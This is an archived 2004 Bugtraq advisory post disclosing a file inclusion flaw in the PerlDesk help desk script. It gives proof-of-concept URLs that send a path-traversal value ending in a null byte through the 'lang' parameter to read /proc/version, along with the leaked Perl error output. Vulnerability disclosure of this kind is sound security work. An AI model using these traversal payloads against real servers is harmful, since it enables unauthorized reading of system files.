[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Posible Inclusion File in Perl Desk
From: Nikyt0x Argentina <nikyt0x () hotmail ! com>
Date: 2004-09-12 18:28:36
Message-ID: 20040912182836.10080.qmail () www ! securityfocus ! com
[Download RAW message or body]
Posible Inclusion File in Perl Desk
0000-0002 Adv-Nkxtox
[Date] 12/09/04
[Author] Nikyt0x nikyt0x[at]hotmail[dot]com
[Site] Http://nikyt0x.webcindario.com
[Information]
PerlDesk is a feature packed web based help desk and email management application \
designed to streamline the operation of managing emails or support requests, with \
built in tracking and response logging it is an ideal help desk solution for \
companies with one or more members of staff or for those who want to organise client \
support.
[Bug]
Bug is in Inclusion in lang.
Http://server/cgi-bin/pdesk.cgi?lang=h4x0rs%20Rul3z
Can't locate include/lang/h4x0rs Rul3z.inc in @INC (@INC contains: include/mods \
/etc/perl /usr/lib/perl5/site_perl/5.8.0/i686-linux /usr/lib/perl5/site_perl/5.8.0 \
/usr/lib/perl5/site_perl /usr/lib/perl5/vendor_perl/5.8.0/i686-linux \
/usr/lib/perl5/vendor_perl/5.8.0 /usr/lib/perl5/vendor_perl \
/usr/lib/perl5/5.8.0/i686-linux /usr/lib/perl5/5.8.0 /usr/local/lib/site_perl .) at \
/home/httpd/html/***.****.***/cgi-bin/pdesk.cgi line 56.
But if you use: pdesk.cgi?lang=[file]%00 :
Http://server/cgi-bin/pdesk.cgi?lang=../../../../../../../proc/version%00
syntax error at include/lang/../../../../../../../proc/version line 1, near "2.4.21 \
(" Compilation failed in require at /home/httpd/html/***.****.***/cgi-bin/pdesk.cgi \
line 56.
If you read error, you can see Version of Kernel "2.4.21".
...I love this game...
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic